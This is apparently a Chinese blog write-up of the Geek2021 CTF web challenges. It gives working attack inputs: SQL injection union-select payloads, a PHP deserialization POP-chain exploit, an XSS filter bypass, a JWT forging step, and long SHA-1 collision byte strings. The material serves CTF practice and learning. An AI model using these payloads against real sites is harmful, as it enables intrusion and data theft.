<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/bitbug_favicon.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/bitbug_favicon.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"jonathanbest7.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="第十二届极客大挑战WP​                                                                                                             yinzkk–WEB ​">
<meta property="og:type" content="article">
<meta property="og:title" content="Geek2021">
<meta property="og:url" content="https://jonathanbest7.github.io/2021/12/03/Geek2021/index.html">
<meta property="og:site_name" content="bj777的blog">
<meta property="og:description" content="第十二届极客大挑战WP​                                                                                                             yinzkk–WEB ​">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202259031.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202333755.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202422268.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202457607.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202518190.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202543768.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202611396.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202629354.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202643962.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202702300.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202723104.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202740444.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202755589.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202824925.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202846686.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211113142820637.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211113142837320.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115202339717.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115202405129.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115202416267.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115202823571.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115204404594.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115204426830.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114001054680.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114001438411.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114001539130.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114001656859.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114001721440.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115192956744.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115185834824.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115185856584.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115185844223.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115185912822.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115185924295.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115185930810.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115185935630.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115185942943.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115193218585.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115192106854.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114203834237.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115160257039.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115155839509.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115155853794.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114204424892.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114204740383.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115160220863.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116112920543.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115160033225.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114232000260.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190006547.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190014965.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190024178.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190031018.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190051426.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190104183.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190211239.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190224604.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190234839.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190335785.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190358709.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190420884.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190437952.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190449900.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115190517404.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211113145150501.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211113145322194.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211113145429158.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/A9DCK~%252525A%252525ZW%25257DHDLIF%25257B6OTHK.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211113145910066.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211113150049138.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211113150838314.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211113165941957.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211113165904421.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211113191841377.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211113191948745.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114130739257.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114131940514.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114131126720.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114133613154.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114133531087.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114134108021.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114134318912.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114140353745.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114151438067.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114145611392.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211114151804489.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115191133868.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116164621695.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116164652815.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116201854819.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211117182828120.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115161502955.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115161509482.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115161536782.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115161549587.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115161610268.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115161620454.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115161630664.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115161646838.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115161711605.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115161821206.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115161904038.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115184308707.png">
<meta property="og:image" content="https://jonathanbest7.github.io/Geek2021/image-20211115184319854.png">
<meta property="article:published_time" content="2021-12-03T15:22:15.000Z">
<meta property="article:modified_time" content="2022-07-17T16:39:10.619Z">
<meta property="article:author" content="bj777">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://jonathanbest7.github.io/Geek2021/image-20211116202259031.png">

<link rel="canonical" href="https://jonathanbest7.github.io/2021/12/03/Geek2021/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Geek2021 | bj777的blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">bj777的blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">记录学习每一瞬间</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">0</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">0</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">25</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://jonathanbest7.github.io/2021/12/03/Geek2021/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/bitbug_favicon.ico">
      <meta itemprop="name" content="bj777">
      <meta itemprop="description" content="一位逆向菜狗">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="bj777的blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Geek2021
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-12-03 23:22:15" itemprop="dateCreated datePublished" datetime="2021-12-03T23:22:15+08:00">2021-12-03</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-07-18 00:39:10" itemprop="dateModified" datetime="2022-07-18T00:39:10+08:00">2022-07-18</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="第十二届极客大挑战WP"><a href="#第十二届极客大挑战WP" class="headerlink" title="第十二届极客大挑战WP"></a><em><strong>第十二届极客大挑战WP</strong></em></h1><p>​                                                                                                             yinzkk–WEB</p>
<p>​                                                                                                             bj777–RE+MISC+PWN+Crypto</p>
<h2 id="1-Dark"><a href="#1-Dark" class="headerlink" title="1 Dark"></a><strong>1 Dark</strong></h2><p>1.挂个vpn</p>
<p>2.用tor打开</p>
<p>3.在源代码中</p>
<p><img src="/Geek2021/image-20211116202259031.png"></p>
<h2 id="2-WELCOME"><a href="#2-WELCOME" class="headerlink" title="2 WELCOME"></a><strong>2 WELCOME</strong></h2><p>抓包改包</p>
<p><img src="/Geek2021/image-20211116202333755.png"></p>
<h2 id="3-babySQL注入"><a href="#3-babySQL注入" class="headerlink" title="3 babySQL注入"></a><strong>3 babySQL注入</strong></h2><p>一开始</p>
<p>我是</p>
<p>呜呜呜一点反应都没有</p>
<p>然后先在url里面输入了一个?id&#x3D;1</p>
<p><img src="/Geek2021/image-20211116202422268.png"></p>
<p>进入了这个jeff的后台</p>
<p>然后折腾了半天</p>
<p>发现</p>
<p><img src="/Geek2021/image-20211116202457607.png"></p>
<p>呜呜呜</p>
<p>没数据</p>
<p>发现得在密码里面注入了</p>
<p>进行order判断</p>
<p>在第5个的时候出现no data</p>
<p>所以判断4个（没截图到呜呜呜）</p>
<p>然后再用union select来把</p>
<p><img src="/Geek2021/image-20211116202518190.png"></p>
<p>爆出来</p>
<p>那就改12</p>
<p><img src="/Geek2021/image-20211116202543768.png"></p>
<p>-1’ union select 1,database(),3,4#然后又查这个 发现 no data</p>
<p>呜呜呜我麻了</p>
<p><img src="/Geek2021/image-20211116202611396.png"></p>
<p>发现查1也可以</p>
<p>-1’ union select (select group_concat(table_name) from information_schema.tables where</p>
<p>table_schema&#x3D;’babysql‘),2,3,4#</p>
<p>百度到要在外面加个括号</p>
<p>出来了</p>
<p><img src="/Geek2021/image-20211116202629354.png"></p>
<p>这个</p>
<p><img src="/Geek2021/image-20211116202643962.png"></p>
<p>-1’ union select (select group_concat(column_name) from information_schema.columns where</p>
<p>table_name&#x3D;’jeff’),2,3,4#</p>
<p>看jeff这个表</p>
<p>出现了这么多列</p>
<p>一个个查呜呜呜</p>
<p><img src="/Geek2021/image-20211116202702300.png"></p>
<p>一通操作发现</p>
<p>tm 这个flag根本不在这个库</p>
<p>呜呜呜一切重新开始</p>
<p>笑死</p>
<p>猜一个数据库名字为flag(真没办法 不会SQLMAP查数据库)</p>
<p>想到我们是要找flag 所以干脆死马当活马医</p>
<p>结果</p>
<p>真特么</p>
<p><img src="/Geek2021/image-20211116202723104.png"></p>
<p>笑死</p>
<p>然后继续查</p>
<p><img src="/Geek2021/image-20211116202740444.png"></p>
<p>真尼玛离谱</p>
<p>不会真出来了吧</p>
<p><img src="/Geek2021/image-20211116202755589.png"></p>
<p>好耶！</p>
<p>泪目</p>
<h2 id="4where-is-my-FUMO"><a href="#4where-is-my-FUMO" class="headerlink" title="4where_is_my_FUMO"></a><strong>4where_is_my_FUMO</strong></h2><p><img src="/Geek2021/image-20211116202824925.png"></p>
<p>发现了这个</p>
<p>笑死</p>
<p>卡死</p>
<h2 id="5babyPOP"><a href="#5babyPOP" class="headerlink" title="5babyPOP"></a><strong>5babyPOP</strong></h2><p><img src="/Geek2021/image-20211116202846686.png"></p>
<p>有unserialize函数且参数可控</p>
<p>在C这个类中有__wakeup的方法</p>
<p>在D这个类中有__invoke方法</p>
<p>在e这个类中有__destruct方法</p>
<p>__destruct()对象销毁自动调用</p>
<p>条件为$Do_u_like_JiaRan为true</p>
<p>到 __wake up 里有这个 然后又是反序列化之前调用 所以 在类 e 里 new c ($this-&gt;afkl)();又看到个这个</p>
<p>调用了 __invoke 再new个d</p>
<p>然后又触发了上面的 __toString()</p>
<p>构建一个exp试试</p>
<?php 

class a{ 

public static $Do_u_like_JiaRan = false; 

public static $Do_u_like_AFKL = false; 

}

class b{ 

private $i_want_2_listen_2_MaoZhongDu; 

public function __construct(){ 

$this->i_want_2_listen_2_MaoZhongDu; 

} 

}

class d{ 

public $value; 

public function __construct(){ 

$this->value=new b(); 

} 

}

class c{} 

class e{ 

public $var; 

public $afkl; 

public function __construct() 

{ 

$this->var=new c(); 

$this->var=new d(); 

} 

}

echo urlencode(base64_encode(serialize(new e())));

![](Geek2021/image-20211116202912390.png)

得到这个![](Geek2021/image-20211116202925676.png)

但是没回显离谱

百度发现需要requests

![](Geek2021/image-20211116202940819.png)

## 6**babyphp**

进来是一个大大的图片

先不管 先抓包



![](Geek2021/image-20211116202953433.png)

拉到最下面发现有个这个

打开robots.txt

![](Geek2021/image-20211116203027403.png)

是个php

打开看看

![](Geek2021/image-20211116203045721.png)

发现提示

flag在根目录（忽略歌词）

根目录

我想想根目录在哪

mad

卡我几天

全是卡在php上面

![](Geek2021/image-20211116203059857.png)

草 一种植物

做这个做得心态都炸了

泪目

## 7**蜜雪冰城甜蜜蜜**

打开是个

![](Geek2021/image-20211116203119364.png)

讲我们要的是九号

翻了一下

刚好只有八个呜呜

咋办呢 看看源代码发现一大堆奇奇怪怪的不认识的东西i

随便点了几个发现没有思路

想起攻防世界的一道题

可以去改源代码试试看

![](Geek2021/image-20211116203139444.png)

图片上本没有九

要喝多人多了

咱们也得改个九

## 8**人民艺术家**

进来是一个diao图咱们试试登录

登录失败

![](Geek2021/image-20211116203154144.png)

进了一个这样的

试试抓包

![](Geek2021/image-20211116203210289.png)

发现有个Jwt

![](Geek2021/image-20211116203225880.png)

去学习了之后

![](Geek2021/image-20211116203237461.png)

发现是这样

题目要2019年的

发现改不了

那咋办

![](Geek2021/image-20211116203255616.png)

去官网试试

我们去看看

![](Geek2021/image-20211116203312546.png)

要改成19年的

咋改呢

![](Geek2021/image-20211116203323635.png)

好像这里可以输入密码

hashcat破解

得到私钥为

![](Geek2021/image-20211116203338752.png)

然后咋搞呢

我想让原来的页面变成2019的

![](Geek2021/image-20211116203356160.png)

没反应

为啥呢

我再回去检查一遍

发现

![](Geek2021/image-20211116203407300.png)

尽管来到了2019,我还是一个假的admin.jpg

![](Geek2021/image-20211116203427699.png)



![](Geek2021/image-20211116203440252.png)

![](Geek2021/image-20211116203449073.png)

## 9**babyxss**

先看看随便一个JS语句能不能用

![](Geek2021/image-20211116203501842.png)

提示被标记

说明不是反射型XSS

进去后发现

![](Geek2021/image-20211116203521210.png)

alert被过滤

![](Geek2021/image-20211116203536640.png)

需双写绕过

再继续

![](Geek2021/image-20211116203557053.png)

发现一加入就会报错

不知道为啥

我百度了第一个方法

把变成<\/script>

![](Geek2021/image-20211116203614017.png)

并不行

第二种方法

加入闭合

注释掉script以后的

得到flag

![](Geek2021/image-20211116203627388.png)

Server response: 'Syc{W4lc0me_t0_the_w0rld_0f_x3s.}'. 

payload：

</script><script>alertalert(1)</script>

## 10**雷克雅未克**

先抓包XFF改IP

再在cookie改经纬度

x为jin，y为Wei

得到JSfuck

百度用法

得到flag

## 11**黑魔法**

先进来

![](Geek2021/image-20211116203744885.png)

代码要求是要password大于9999还要弱类型

![](Geek2021/image-20211116203800895.png)

然后输入11337a 因为之前是1337所以这次直接加个1

查看源代码

![](Geek2021/image-20211116203816852.png)

有下一个Php

![](Geek2021/image-20211116203828178.png)

进去后

是要我们输入user！=pass

然后又要sha后的user=pass

因为sha不能检测数组

所以就数组绕过

![](Geek2021/image-20211116203847285.png)

这次检测了数组了

于是我们构建一个

两个值不同但是sha相同的

sha强类型碰撞

（网上白嫖的）

%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3 

C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F% 

54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69 

%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%5 

2%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F% 

6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31 

%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4 

C%97%E1%FF%FE%01%7F%46%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2%56%0B%45%CA%67%D6%88% 

C7%F8%4B%8C%4C%79%1F%E0%2B%3D%F6%14%F8%6D%B1%69%09%01%C5%6B%45%C1%53%0A%FE%DF%B7 

%60%38%E9%72%72%2F%E7%AD%72%8F%0E%49%04%E0%46%C2%30%57%0F%E9%D4%13%98%AB%E1%2E%F 

5%BC%94%2B%E3%35%42%A4%80%2D%98%B5%D7%0F%2A%33%2E%C3%7F%AC%35%14%E7%4D%DC%0F%2C% 

C1%A8%74%CD%0C%78%30%5A%21%56%64%61%30%97%89%60%6B%D0%BF%3F%98%CD%A8%04%46%29%A1 

%3C%68%74%6D%6C%3E%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%6A%61%7 

6%61%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72% 

69%70%74%22%3E%0A%3C%21%2D%2D%20%40%61%72%77%20%2D%2D%3E%0A%0A%76%61%72%20%68%20 

%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%6 

7%4E%61%6D%65%28%22%48%54%4D%4C%22%29%5B%30%5D%2E%69%6E%6E%65%72%48%54%4D%4C%2E% 

63%68%61%72%43%6F%64%65%41%74%28%31%30%32%29%2E%74%6F%53%74%72%69%6E%67%28%31%36 

%29%3B%0A%69%66%20%28%68%20%3D%3D%20%27%37%33%27%29%20%7B%0A%20%20%20%20%64%6F%6 

3%75%6D%65%6E%74%2E%62%6F%64%79%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%22%3C%53% 

54%59%4C%45%3E%62%6F%64%79%7B%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A 

%52%45%44%3B%7D%20%68%31%7B%66%6F%6E%74%2D%73%69%7A%65%3A%35%30%30%25%3B%7D%3C%2 

F%53%54%59%4C%45%3E%3C%48%31%3E%26%23%78%31%66%36%34%38%3B%3C%2F%48%31%3E%22%3B% 

0A%7D%20%65%6C%73%65%20%7B%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79 

%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%22%3C%53%54%59%4C%45%3E%62%6F%64%79%7B%6 

2%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%42%4C%55%45%3B%7D%20%68%31%7B% 

66%6F%6E%74%2D%73%69%7A%65%3A%35%30%30%25%3B%7D%3C%2F%53%54%59%4C%45%3E%3C%48%31 

%3E%26%23%78%31%66%36%34%39%3B%3C%2F%48%31%3E%22%3B%0A%7D%0A%0A%3C%2F%73%63%72%6 

9%70%74%3E%0A%0A 

和

%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3 

C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F% 

54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69 

%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%5 

2%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F% 

6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31 

%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4 

C%97%E1%FF%FE%01%73%46%DC%91%66%B6%7E%11%8F%02%9A%B6%21%B2%56%0F%F9%CA%67%CC%A8% 

C7%F8%5B%A8%4C%79%03%0C%2B%3D%E2%18%F8%6D%B3%A9%09%01%D5%DF%45%C1%4F%26%FE%DF%B3 

%DC%38%E9%6A%C2%2F%E7%BD%72%8F%0E%45%BC%E0%46%D2%3C%57%0F%EB%14%13%98%BB%55%2E%F 

5%A0%A8%2B%E3%31%FE%A4%80%37%B8%B5%D7%1F%0E%33%2E%DF%93%AC%35%00%EB%4D%DC%0D%EC% 

C1%A8%64%79%0C%78%2C%76%21%56%60%DD%30%97%91%D0%6B%D0%AF%3F%98%CD%A4%BC%46%29%B1 

%3C%68%74%6D%6C%3E%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%6A%61%7 

6%61%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72% 

69%70%74%22%3E%0A%3C%21%2D%2D%20%40%61%72%77%20%2D%2D%3E%0A%0A%76%61%72%20%68%20 

%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%6 

7%4E%61%6D%65%28%22%48%54%4D%4C%22%29%5B%30%5D%2E%69%6E%6E%65%72%48%54%4D%4C%2E% 

63%68%61%72%43%6F%64%65%41%74%28%31%30%32%29%2E%74%6F%53%74%72%69%6E%67%28%31%36 

%29%3B%0A%69%66%20%28%68%20%3D%3D%20%27%37%33%27%29%20%7B%0A%20%20%20%20%64%6F%6 

3%75%6D%65%6E%74%2E%62%6F%64%79%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%22%3C%53% 

54%59%4C%45%3E%62%6F%64%79%7B%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A 

%52%45%44%3B%7D%20%68%31%7B%66%6F%6E%74%2D%73%69%7A%65%3A%35%30%30%25%3B%7D%3C%2 

F%53%54%59%4C%45%3E%3C%48%31%3E%26%23%78%31%66%36%34%38%3B%3C%2F%48%31%3E%22%3B% 

0A%7D%20%65%6C%73%65%20%7B%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79 

%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%22%3C%53%54%59%4C%45%3E%62%6F%64%79%7B%6 

2%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%42%4C%55%45%3B%7D%20%68%31%7B% 

